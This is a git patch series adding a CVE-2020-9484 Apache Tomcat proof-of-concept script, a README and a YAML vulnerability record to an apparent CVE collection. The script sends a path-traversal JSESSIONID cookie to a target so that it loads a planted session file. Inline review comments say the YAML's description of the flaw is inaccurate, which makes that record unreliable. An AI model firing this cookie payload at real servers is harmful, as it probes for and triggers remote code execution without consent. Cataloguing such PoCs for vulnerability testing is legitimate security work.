From 2adeb161983136182da6c6df3998e279ea87f538 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:05:55 +0000
Subject: [PATCH 1/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202020?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-tomcat/2020/.keep
diff --git a/cve/apache-tomcat/2020/.keep b/cve/apache-tomcat/2020/.keep
new file mode 100644
index 00000000..e69de29b
--
Gitee
From 63975dc8cde0e5f03167bf643f598e5b612f78d0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:09:48 +0000
Subject: [PATCH 2/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-9484?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/CVE-2020-9484/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/.keep
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/.keep b/cve/apache-tomcat/2020/CVE-2020-9484/.keep
new file mode 100644
index 00000000..e69de29b
--
Gitee
From 3258fd072e5920cf6e706e66ce619defc7b788d9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:10:15 +0000
Subject: [PATCH 3/9] aaa
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 于越
---
 .../2020/CVE-2020-9484/CVE-2020-9484.py | 37 +++++++++++++++++++
 .../2020/CVE-2020-9484/README.md | 13 +++++++
 2 files changed, 50 insertions(+)
 create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
 create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/README.md
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
new file mode 100644
index 00000000..084b803f
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
@@ -0,0 +1,37 @@
+import requests
+import os, sys
+
+
+
+def main():
+ print("CVE: CVE-2020-9484")
+ RHOST = input("Target : ")
+ try:
+ u = requests.get(f"{RHOST}/index.jsp")
+ if u.status_code == 200:
+ print("Found Index Page")
+ pass
+ elif u.status_code == 404:
+ print("Looks Like we Could not Find index Page")
+ sys.exit()
+ header = {
+ "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+ }
+ sett = requests.get(f"{RHOST}/index.jsp", headers=header)
+ if sett.status_code == 200:
+ print(sett.text)
+ #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null")
+ #print("If Any Results They Will be Saved in result.txt")
+ print("Output ^")
+ if sett.status_code == 500:
+ print("Patched")
+ sys.exit()
+
+ if sett.text == " ":
+ print("No Content")
+ pass
+
+ except Exception as e:
+ print("Looks Like there Was A Problem Connecting to Target")
+
+main()
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
new file mode 100644
index 00000000..1f18c3ce
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
@@ -0,0 +1,13 @@
+# Tomcat-RCE
+Apache Tomcat RCE
+#Use
+Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求,造成反序列化代码执行漏洞。
+[-] Apache Tomcat RCE漏洞 (CVE-2020-9484)
+
+
+# eg
+
+python3 CVE-2020-9484.py
+
+# reference
+code from: https://github.com/RepublicR0K/CVE-2020-9484
--
Gitee
From 53fb10c4e882155d261cef0aa58e21a531e6f7ec Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:10:28 +0000
Subject: [PATCH 4/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/2020/.keep
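Review bot: The result reporting in `main()` of CVE-2020-9484.py cannot be trusted as a patch check: `if sett.status_code == 500: print("Patched")` labels any server error as a fixed host, although a 500 says nothing about which Tomcat release is running, so the script can give false assurance. Report it as inconclusive, e.g. `print("HTTP 500: inconclusive, confirm the Tomcat version")`, and decide patch status from the installed version. `except Exception as e:` never uses `e` and prints a connection failure for every error, including a target entered without a scheme, and both `requests.get` calls have no `timeout=`; print `e` and pass an explicit timeout. The commented-out `os.system(f"curl '{RHOST}/index.jsp' ...")` line should be deleted, because re-enabling it would place the typed target inside a shell command string, and the bare `main()` call wants an `if __name__ == "__main__":` guard.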
diff --git a/cve/apache-tomcat/2020/.keep b/cve/apache-tomcat/2020/.keep
deleted file mode 100644
index e69de29b..00000000
--
Gitee
From a621c3b68fd63e2decc6fc8b5ff2368598602796 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:10:34 +0000
Subject: [PATCH 5/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/CVE-2020-9484/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/CVE-2020-9484/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/.keep
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/.keep b/cve/apache-tomcat/2020/CVE-2020-9484/.keep
deleted file mode 100644
index e69de29b..00000000
--
Gitee
From c294bce8b4cec562dcce94fd49402f590aa16d28 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:10:49 +0000
Subject: [PATCH 6/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-tomcat/2020/yaml/.keep
diff --git a/cve/apache-tomcat/2020/yaml/.keep b/cve/apache-tomcat/2020/yaml/.keep
new file mode 100644
index 00000000..e69de29b
--
Gitee
From 05b19c7f945ac0a3325d1cbd9177afe2a74a25b1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:11:02 +0000
Subject: [PATCH 7/9] aaa
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 于越
---
 .../2020/yaml/CVE-2020-9484.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
new file mode 100644
index 00000000..e4cf2843
--- /dev/null
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-9484
+source: https://github.com/RepublicR0K/CVE-2020-9484
+info:
+ name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ severity: high
+ description:
+ 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ scope-of-influence:
+ Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103
+ reference:
+ - https://seclists.org/oss-sec/2020/q2/136
+ - https://www.seebug.org/vuldb/ssvid-98234
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.0
+ cve-id: CVE-2020-9484
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Apache, Tomcat, RCE
--
Gitee
From 609377cd83e29f0298d0fe6558d58709e0c53483 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:11:08 +0000
Subject: [PATCH 8/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/yaml/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-tomcat/2020/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/2020/yaml/.keep
diff --git a/cve/apache-tomcat/2020/yaml/.keep b/cve/apache-tomcat/2020/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
--
Gitee
From 7cb70172f49000f5def94a135fbd0f715d5f6b66 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 07:11:46 +0000
Subject: [PATCH 9/9] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 于越
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)
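Review bot: The `description` text in CVE-2020-9484.yaml, repeated inside `name`, describes deserialization through cluster session synchronisation without EncryptInterceptor, which does not appear to be the issue tracked as CVE-2020-9484; as far as I know the upstream advisory for that id concerns session deserialization when the PersistentManager is used with a FileStore. Anyone triaging from this record would look at the wrong configuration, so the description should name the PersistentManager/FileStore precondition and `name` should be a short title such as `name: Apache Tomcat session persistence deserialization RCE`. In `scope-of-influence` the leading `<` in `Apache Tomcat < 10.0.0-M1 to 10.0.0-M4` contradicts the range that follows and should be dropped. `cnvd-id: None` and `kve-id: None` are plain strings in YAML; confirm the consumer expects that rather than an empty value.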
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b35d0b64..eb286f76 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -10,6 +10,7 @@ cve:
 - CVE-2021-27905
 apache-tomcat:
 - CVE-2022-29885
+ - CVE-2020-9484
 apache-Spark:
 - CVE-2022-33891
 linux-kernel:
--
Gitee